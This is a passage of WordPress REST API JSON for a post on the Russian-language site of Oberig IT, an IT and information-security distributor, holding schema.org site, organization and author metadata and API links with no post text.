IT","description":"\u0414\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u044f \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0441\u043d\u044b\u0445 \u0418\u0422 \u0438 \u0418\u0411 \u0440\u0435\u0448\u0435\u043d\u0438\u0439","publisher":{"@id":"https:\/\/oberig-it.com\/ru\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/oberig-it.com\/ru\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ru-RU"},{"@type":"Organization","@id":"https:\/\/oberig-it.com\/ru\/#organization","name":"Oberig IT","url":"https:\/\/oberig-it.com\/ru\/","logo":{"@type":"ImageObject","inLanguage":"ru-RU","@id":"https:\/\/oberig-it.com\/ru\/#\/schema\/logo\/image\/","url":"https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/06\/logo-new.svg","contentUrl":"https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/06\/logo-new.svg","caption":"Oberig IT"},"image":{"@id":"https:\/\/oberig-it.com\/ru\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Oberig.disti"]},{"@type":"Person","@id":"https:\/\/oberig-it.com\/ru\/#\/schema\/person\/9d804f9c469169d256ca04bc0446793d","name":"Albekova Paula","image":{"@type":"ImageObject","inLanguage":"ru-RU","@id":"https:\/\/oberig-it.com\/ru\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/267b2447d88f2254471421efc84e51964ec66e50c0a67b40f9346d135523b971?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/267b2447d88f2254471421efc84e51964ec66e50c0a67b40f9346d135523b971?s=96&d=mm&r=g","caption":"Albekova Paula"},"sameAs":["https:\/\/oberig-it.com\/"]}]}},"_links":{"self":[{"href":"https:\/\/oberig-it.com\/ru\/wp-json\/wp\/v2\/posts\/9367","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/oberig-it.com\/ru\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/oberig-it.com\/ru\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/oberig-it.com\/ru\/wp-json\/wp\/v2\/users\/850"}],"replies":[{"embeddable":true,"href":"https:\/\/oberig-it.com\/ru\/wp-json\/wp\/v2\/comments?post=9367"}],"version-history":[{"count":5,"href":"https:\/\/oberig-it.com\/ru\/wp-json\/wp\/v2\/posts\/9367\/revisions"}],"predecessor-version":[{"id":9407,"href":"https:\/\/oberig-it.com\/ru\/wp-json\/wp\/v2\/posts\/9367\/revisions\/9407"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/oberig-it.com\/ru\/wp-json\/wp\/v2\/media\/9354"}],"wp:attachment":[{"href":"https:\/\/oberig-it.com\/ru\/wp-json\/wp\/v2\/media?parent=9367"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/oberig-it.com\/ru\/wp-json\/wp\/v2\/categories?post=9367"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/oberig-it.com\/ru\/wp-json\/wp\/v2\/tags?post=9367"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}